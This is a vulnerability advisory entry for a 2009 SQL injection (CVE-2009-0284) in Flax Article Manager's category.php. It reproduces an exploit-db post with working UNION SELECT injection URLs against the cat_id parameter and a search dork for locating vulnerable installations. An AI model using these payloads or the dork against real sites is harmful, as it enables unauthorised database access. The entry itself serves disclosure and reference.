flaxweb flax_article_manager SQL Injection Vulnerability

Vulnerability ID: 1117283 Vulnerability type: SQL injection
Published: 2009-01-25 Updated: 2009-06-03
CVE ID: CVE-2009-0284 CNNVD ID: CNNVD-200901-360
Platform: PHP CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/7862
https://cxsecurity.com/issue/WLB-2009010217
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-360
|Vulnerability details
The category.php script in Flax Article Manager 1.1 contains a SQL injection vulnerability. A remote attacker can execute arbitrary SQL commands via the cat_id parameter.
|Vulnerability exploit
-------------------------------------------------------------------------

  --          JIKO FroM No-exploit.Com        ---

-------------------------------------------------------------------------

# Author  : jiko

# email  : jalikom@hotmail.com

# Home   : www.no-exploit.Com

# Script  : http://www.clixint.com/products/articles -->Article Manager -->Price: $99 USD
              $99*10 Dh(maroc)=990Dh=19800 Real maghribi
# Dork: Copyright 2006 © Flax Article Manager v1.1

=========================[JAWAD Cha7ta 4 ever]===================

# Exploit  :

               http://no-exploit.com

            Demo:    

 http://www.articlesitedemo.com/category.php?cat_id=3%20and%201=0%20union%20select%200,1,user(),3,4,5--
 http://www.articlesitedemo.com/category.php?cat_id=3%20and%201=0%20union%20select%200,1,version(),3,4,5-- (V 4 :) )
 

Top: ( R07 T9awwad ) To str0ke & Milw0rM

 Cyber-Zone CHof Lfo9

=========================[Thanks To Allah ]===================
 We are with you, Gaza; may God have mercy on your martyrs


 greetz : all my friends and all No-exploit members and

 $ cyber-zone $ leopard $ Hassin X

 all muslims

 cyber-zone Wald Bladi B7al Khoya
-------------------------------------------------------------------------

  --          JIKO FroM No-exploit.Com        ---

-------------------------------------------------------------------------

------==        troops of Mohamed coming inchalah      =-----------------

I am Muslim, I am Arab, I am Moroccan, my country is Morocco

# milw0rm.com [2009-01-25]
|References

Source: BID
Name: 33422
Link: http://www.securityfocus.com/bid/33422
Source: MILW0RM
Name: 7862
Link: http://www.milw0rm.com/exploits/7862
Source: www.flaxweb.com
Link: http://www.flaxweb.com/products/articles
Source: SECUNIA
Name: 33625
Link: http://secunia.com/advisories/33625